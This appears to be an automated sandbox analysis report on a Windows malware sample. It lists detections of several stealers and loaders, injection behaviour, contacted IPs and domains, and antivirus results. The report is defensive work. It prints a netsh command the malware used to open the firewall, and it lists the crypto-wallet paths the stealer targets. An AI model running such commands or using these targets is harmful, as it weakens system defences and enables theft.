Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\B3BA.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_004092D7 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Code function: 19_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_00401733 __EH_prolog,CompareFileTime,EnumSystemLocalesW,GetConsoleAliasesA,FindResourceExW,GetVersionExA,VirtualQuery,CreateThread,SetComputerNameExA,_printf,_malloc,_calloc,__wfopen_s,_fseek,__floor_pentium4,_puts,GetConsoleAliasA,GetModuleHandleA,GlobalAlloc,GetConsoleTitleA,GetConsoleTitleA,GetConsoleTitleA,GetAtomNameW,CreateIoCompletionPort,GetFileAttributesW,GetDefaultCommConfigW,

                          Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Modifies the windows firewall
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

                          Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match | File source: 42.2.B3BA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.0.B3BA.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.0.B3BA.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.0.B3BA.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.B3BA.exe.399f910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.0.B3BA.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.0.B3BA.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.B3BA.exe.3adba90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.B3BA.exe.399f910.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.B3BA.exe.3adba90.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000014.00000002.565709295.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000000.537971963.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000002.629733104.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000000.539310965.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000000.538607329.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.566907931.00000000039F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000000.537161217.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: dump.pcap, type: PCAP
Yara detected Amadeys stealer DLL
Source: Yara match | File source: 0000002F.00000003.564856564.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000002.573157058.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000002.573324448.0000000000580000.00000040.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match | File source: 0.2.0Cjy7Lkv1A.exe.4615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.0Cjy7Lkv1A.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.1.ujhcrda.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.0Cjy7Lkv1A.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.ujhcrda.5315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.ujhcrda.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.0Cjy7Lkv1A.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.0Cjy7Lkv1A.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.0Cjy7Lkv1A.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.419458917.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.404651747.0000000004151000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.419524662.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.471381402.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.471483923.0000000000491000.00000004.00020000.sdmp, type: MEMORY
Yara detected Amadey bot
Source: Yara match | File source: dump.pcap, type: PCAP
Yara detected Raccoon Stealer
Source: Yara match | File source: 0000002C.00000002.738735707.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000003.564687179.0000000004E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.629029283.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match | File source: 00000011.00000002.474690379.0000000000571000.00000004.00000020.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match | File source: 36.2.szdcdkt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 39.2.svchost.exe.a50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.szdcdkt.exe.670e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.A8FB.exe.550e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.szdcdkt.exe.eb0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.szdcdkt.exe.eb0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.3.szdcdkt.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 39.2.svchost.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.A8FB.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.szdcdkt.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.A8FB.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.3.A8FB.exe.570000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000024.00000003.507342269.0000000000690000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.499421318.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.511069227.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.510317453.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.480122610.0000000000570000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.510779082.0000000000670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.631897455.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.501018079.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: A8FB.exe PID: 4692, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: szdcdkt.exe PID: 2972, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6780, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmpString found in binary or memory: m-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmpString found in binary or memory: m8C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                          Source: B3BA.exeString found in binary or memory: set_UseMachineKeyStore
                          Source: Yara matchFile source: 00000011.00000002.474690379.0000000000571000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.748388079.0000000005114000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: B3BA.exe PID: 1756, type: MEMORYSTR

Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match, file source: 42.2.B3BA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 42.0.B3BA.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 42.0.B3BA.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match, file source: 42.0.B3BA.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, file source: 20.2.B3BA.exe.399f910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 42.0.B3BA.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, file source: 42.0.B3BA.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match, file source: 20.2.B3BA.exe.3adba90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 20.2.B3BA.exe.399f910.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 20.2.B3BA.exe.3adba90.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000014.00000002.565709295.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000002A.00000000.537971963.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000002A.00000002.629733104.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000002A.00000000.539310965.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000002A.00000000.538607329.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000014.00000002.566907931.00000000039F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000002A.00000000.537161217.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match, file source: 0.2.0Cjy7Lkv1A.exe.4615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.0Cjy7Lkv1A.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 13.1.ujhcrda.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.0.0Cjy7Lkv1A.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, file source: 12.2.ujhcrda.5315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 13.2.ujhcrda.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.0.0Cjy7Lkv1A.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.1.0Cjy7Lkv1A.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.0.0Cjy7Lkv1A.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000001.00000002.419458917.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000000.404651747.0000000004151000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.419524662.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000D.00000002.471381402.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000D.00000002.471483923.0000000000491000.00000004.00020000.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match, file source: 0000002C.00000002.738735707.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000002C.00000003.564687179.0000000004E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000002C.00000002.629029283.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match, file source: 00000011.00000002.474690379.0000000000571000.00000004.00000020.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match, file source: 36.2.szdcdkt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 39.2.svchost.exe.a50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 36.2.szdcdkt.exe.670e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 19.2.A8FB.exe.550e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 36.2.szdcdkt.exe.eb0000.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 36.2.szdcdkt.exe.eb0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 36.3.szdcdkt.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 39.2.svchost.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 19.2.A8FB.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 36.2.szdcdkt.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 19.2.A8FB.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 19.3.A8FB.exe.570000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000024.00000003.507342269.0000000000690000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000013.00000002.499421318.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000024.00000002.511069227.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000024.00000002.510317453.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000013.00000003.480122610.0000000000570000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000024.00000002.510779082.0000000000670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000027.00000002.631897455.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000013.00000002.501018079.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: A8FB.exe PID: 4692, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: szdcdkt.exe PID: 2972, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: svchost.exe PID: 6780, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe, code function: 19_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe, code function: 36_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
Source: C:\Windows\SysWOW64\svchost.exe, code function: 39_2_00A588B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts1 | Native API541 | DLL Side-Loading1 | DLL Side-Loading1 | Disable or Modify Tools211 | OS Credential Dumping | System Time Discovery2 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Web Service1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution1 | Valid Accounts1 | Valid Accounts1 | Deobfuscate/Decode Files or Information11 | LSASS Memory | Account Discovery1 | Remote Desktop Protocol | Data from Local System1 | Exfiltration Over Bluetooth | Ingress Tool Transfer15 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter2 | Windows Service14 | Access Token Manipulation1 | Obfuscated Files or Information3 | Security Account Manager | File and Directory Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Encrypted Channel22 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Service Execution3 | Logon Script (Mac) | Windows Service14 | Software Packing33 | NTDS | System Information Discovery237 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Standard Port1 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Process Injection713 | Timestomp1 | LSA Secrets | Query Registry1 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol5 | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading1 | Cached Domain Credentials | Security Software Discovery551 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol36 | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion1 | DCSync | Process Discovery2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading131 | Proc Filesystem | Virtualization/Sandbox Evasion241 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Valid Accounts1 | /etc/passwd and /etc/shadow | Application Window Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Access Token Manipulation1 | Network Sniffing | System Owner/User Discovery1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Virtualization/Sandbox Evasion241 | Input Capture | Remote System Discovery1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols |  |  | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Process Injection713 | Keylogging | System Network Configuration Discovery1 | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS |  |  | Inhibit System Recovery
Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Hidden Files and Directories1 | GUI Input Capture | Domain Groups | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy |  |  | Defacement

Behavior Graph

Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 552945, Sample: 0Cjy7Lkv1A.exe, Startdate: 13/01/2022, Architecture: WINDOWS, Score: 100

Graph nodes (the graph image is not reproduced; its node text is listed by node number, with "->" giving the parent node):

Start node (2):
• DNS/IP: 185.163.45.70, 80 MIVOCLOUDMD Moldova Republic of; 185.163.204.22, 49890, 80 CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE Germany; 12 other IPs or domains
• Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 20 other signatures
• Started: 0Cjy7Lkv1A.exe (11); szdcdkt.exe (14); ujhcrda (16); 6 other processes (18)

0Cjy7Lkv1A.exe (11):
• Signatures: Contains functionality to inject code into remote processes; Injects a PE file into a foreign processes
• Started: 0Cjy7Lkv1A.exe (21)

szdcdkt.exe (14):
• Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Writes to foreign memory regions; Allocates memory in foreign processes
• Started: svchost.exe (24)

ujhcrda (16):
• Signatures: Machine Learning detection for dropped file
• Started: ujhcrda (27)

6 other processes (18):
• DNS/IP: 127.0.0.1 unknown unknown
• Started: WerFault.exe (29)

0Cjy7Lkv1A.exe (21):
• Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration)
• Injected: explorer.exe 10 (31)

svchost.exe (24):
• DNS/IP: microsoft-com.mail.protection.outlook.com 104.47.54.36, 25, 49816 MICROSOFT-CORP-MSN-AS-BLOCKUS United States; patmushta.info 8.209.67.104, 443, 49825, 49910 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore
• Signatures: System process connects to network (likely due to code injection or exploit)

ujhcrda (27):
• Signatures: Creates a thread in another existing process (thread injection)

explorer.exe (31):
• DNS/IP: 185.233.81.115, 443, 49771 SUPERSERVERSDATACENTERRU Russian Federation; 188.166.28.199, 80 DIGITALOCEAN-ASNUS Netherlands; 10 other IPs or domains
• Dropped: C:\Users\user\AppData\Roaming\ujhcrda, PE32; C:\Users\user\AppData\Local\Temp\B3BA.exe, PE32; C:\Users\user\AppData\Local\Temp\A8FB.exe, PE32; 10 other malicious files
• Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)
• Started: 7063.exe (36); A8FB.exe 2 (39); B3BA.exe 3 (42); 60C2.exe (44)

7063.exe (36):
• Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Found evasive API chain (may stop execution after checking mutex); 4 other signatures

A8FB.exe (39):
• Dropped: C:\Users\user\AppData\Local\...\szdcdkt.exe, PE32
• Signatures: Machine Learning detection for dropped file; Uses netsh to modify the Windows network and firewall settings; Modifies the windows firewall
• Started: cmd.exe 1 (46); cmd.exe 2 (49); sc.exe 1 (51); 3 other processes (59)

B3BA.exe (42):
• Dropped: C:\Users\user\AppData\Local\...\B3BA.exe.log, ASCII
• Signatures: Antivirus detection for dropped file; Injects a PE file into a foreign processes
• Started: B3BA.exe (53); B3BA.exe (55)

60C2.exe (44):
• Signatures: Multi AV Scanner detection for dropped file
• Started: WerFault.exe 23 9 (57)

cmd.exe (46):
• Dropped: C:\Windows\SysWOW64\...\szdcdkt.exe (copy), PE32
• Started: conhost.exe (61)

cmd.exe (49): started conhost.exe (63)
sc.exe (51): started conhost.exe (65)
3 other processes (59): started conhost.exe (67); conhost.exe (69); conhost.exe (71)

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
0Cjy7Lkv1A.exe | 38% | Virustotal |
0Cjy7Lkv1A.exe | 54% | ReversingLabs | Win32.Trojan.DllCheck
0Cjy7Lkv1A.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\B3BA.exe | 100% | Avira | HEUR/AGEN.1211353
C:\Users\user\AppData\Local\Temp\8008.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\A8FB.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\9874.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\7063.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\382E.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\szdcdkt.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\B3BA.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\60C2.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\8B25.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\6674.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\5126.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\1BCC.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\ujhcrda | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\1BCC.exe | 63% | ReversingLabs | Win32.Ransomware.StopCrypt
C:\Users\user\AppData\Local\Temp\382E.exe | 29% | Metadefender |
C:\Users\user\AppData\Local\Temp\382E.exe | 81% | ReversingLabs | Win32.Trojan.Raccrypt
C:\Users\user\AppData\Local\Temp\60C2.exe | 46% | Metadefender |
C:\Users\user\AppData\Local\Temp\60C2.exe | 77% | ReversingLabs | Win32.Trojan.Raccoon
C:\Users\user\AppData\Local\Temp\6674.exe | 46% | ReversingLabs | Win32.Trojan.Fragtor
C:\Users\user\AppData\Local\Temp\8008.exe | 63% | ReversingLabs | Win32.Ransomware.StopCrypt

Unpacked PE Files

Source | Detection | Scanner | Label
17.3.7063.exe.4a0000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
14.2.60C2.exe.2080e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
36.2.szdcdkt.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
42.0.B3BA.exe.9b0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
